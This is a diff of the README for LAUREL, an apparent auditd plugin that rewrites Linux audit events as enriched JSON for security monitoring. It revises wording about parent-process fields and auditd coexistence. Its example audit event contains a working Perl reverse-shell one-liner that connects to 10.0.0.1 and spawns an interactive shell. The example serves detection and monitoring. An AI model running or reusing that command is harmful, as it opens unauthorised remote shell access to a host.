threathunters-io/laurel/README.md

 ```
 { … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
 ```
 This happens at the source because _LAUREL_ runs on the host where the audit events are generated.
-The event even contains useful information about the spawning process:
+The event even contains useful information about the parent process (ppid):
 ```
-"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
+"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
 ```

-Logs produced by the Linux Audit subsystem and _auditd(8)_ contain information that can be very useful in a SIEM context (if a useful rule set has been configured).
+Logs produced by the Linux Audit subsystem and _auditd(8)_ contain information that can be very useful for host-based security monitoring.
 However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier.
 Files and program executions are logged via `PATH` and `EXECVE` elements, but a limited character set for strings causes many of those entries to be hex-encoded.
 For a more detailed discussion, see [Practical _auditd(8)_ problems](practical-auditd-problems.md).

 _LAUREL_ solves these problems by consuming audit events, parsing, transforming, enriching them, and writing them out as a separate JSON-based log.
-All information that was part of the original audit log is kept intact. _auditd(8)_ is not replaced as the consumer of audit messages from the Linux kernel.
-Instead, _auditd's_ plugin interface (previously called _"audisp"_) is used, therefore _LAUREL.. can peacefully coexist with other consumers of audit events (e.g. some EDR products).
+All information that was part of the original audit log is kept intact.
+The audit daemon is not replaced as the consumer of audit messages from the Linux kernel.
+Instead, _auditd's_ plugin interface is used, therefore _LAUREL.. can peacefully coexist with other consumers of audit events.

 The chapter [_LAUREL_ installation instructions](INSTALL.md) contains instructions on how to set up and configure usage of the plugin.